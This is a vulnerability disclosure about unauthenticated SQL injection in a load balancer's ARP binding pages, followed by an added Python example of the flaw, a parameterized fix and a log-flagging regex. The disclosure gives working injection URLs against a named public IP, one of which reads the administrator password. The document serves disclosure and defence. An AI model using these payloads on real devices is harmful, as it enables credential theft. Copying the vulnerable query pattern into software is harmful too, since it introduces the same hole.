SQL injection vulnerability in tianrongxin Server Load balancer
A command execution vulnerability has already been submitted; here two SQLite injection vulnerabilities that require no login are submitted.
The vulnerability is a SQLite injection in the ARP binding page, which performs no login verification. Test IP: http://61.148.24.182:8080

Injection 1: a displayed (union-based) injection; the administrator password can be read directly: http://61.148.24.182:8080/acc/bindipmac/static_arp_setting_content.php?ArpName=123%27%20union%20select%,1,%28select%20password%20from%20USERINFO%29--

Injection 2: a blind injection; whether the SQL statement executed successfully can be determined from the ORDER BY error: http://61.148.24.182:8080/acc/bindipmac/static_arp_include.php?IfName=123%27%20order%20by%202--
This vulnerability exists in the Server Load balancer system.
Solution:
Input filtering and permission control
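To make the two remedies concrete, the following is an added example written for this page; it is not code from the original report or from the vendor's product. It models the reported pattern (a request parameter such as ArpName concatenated into a SQLite query on a page with no login check) beside a hardened lookup that enforces authentication, allowlists the ARP entry name, and binds the value as a parameter. The USERINFO table and its password column are taken from the report; every other table, column and sample value is constructed for the demo, and the request-flagging regex is a hypothetical heuristic for log review, not a vendor feature.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Allowlist for a static ARP entry name: letters, digits, '_' and '-', 1-32 chars.
# (Constructed policy for the demo; adjust to the product's real naming rules.)
ARP_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

# Heuristic for reviewing web-server logs: a quote followed by UNION SELECT or
# ORDER BY inside one query string, as seen in the two reported requests.
SQLI_RE = re.compile(r"['\"].*\b(union\s+select|order\s+by)\b", re.I | re.S)

# Payload of the same shape as injection 1 in the report (constructed value).
PAYLOAD = "123' UNION SELECT 1,1,(SELECT password FROM USERINFO)--"


def build_demo_db():
    """In-memory SQLite database with a constructed schema for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE USERINFO (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO USERINFO (username, password) VALUES ('admin', 'constructed-secret')"
    )
    conn.execute(
        "CREATE TABLE static_arp (id INTEGER PRIMARY KEY, name TEXT, ip TEXT, mac TEXT)"
    )
    conn.execute(
        "INSERT INTO static_arp (name, ip, mac) "
        "VALUES ('srv1', '10.0.0.5', '00:11:22:33:44:55')"
    )
    conn.commit()
    return conn


def lookup_arp_vulnerable(conn, arp_name):
    """The reported pattern: untrusted input spliced into the SQL text.

    A crafted name turns a lookup of one ARP entry into a read of USERINFO.
    """
    sql = f"SELECT name, ip, mac FROM static_arp WHERE name = '{arp_name}'"
    return conn.execute(sql).fetchall()


def lookup_arp_hardened(conn, arp_name, authenticated):
    """Hardened lookup: login check, allowlist validation, bound parameter.

    Returns (status, rows) so callers can log denials and rejections.
    """
    if not authenticated:
        return ("denied", [])            # page must not serve unauthenticated users
    if not ARP_NAME_RE.fullmatch(arp_name):
        return ("rejected", [])          # quote characters and SQL keywords never reach the DB
    rows = conn.execute(
        "SELECT name, ip, mac FROM static_arp WHERE name = ?", (arp_name,)
    ).fetchall()                         # '?' binding keeps data and code separate
    return ("ok", rows)


def flag_request(query_string):
    """True if a URL-encoded query string matches the injection heuristic."""
    return bool(SQLI_RE.search(unquote_plus(query_string)))


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable:", lookup_arp_vulnerable(db, PAYLOAD))
    print("hardened  :", lookup_arp_hardened(db, PAYLOAD, authenticated=True))
    print("legit     :", lookup_arp_hardened(db, "srv1", authenticated=True))
    # Constructed query strings in the shape of the two reported requests.
    for qs in ("ArpName=srv1",
               "ArpName=123%27%20union%20select%201%2C%28select%20password%20from%20USERINFO%29--",
               "IfName=123%27%20order%20by%202--"):
        print(f"flag={flag_request(qs)!s:5} {qs}")
```

The allowlist check rejects the crafted name before any SQL is built, and the bound parameter means even an accepted name can never change the statement's structure; the authentication check is listed first because the report's core finding is that the page is reachable without login. The regex is only a triage aid for historical access logs and will miss encodings it does not anticipate, so the parameterized query, not the filter, is the actual fix.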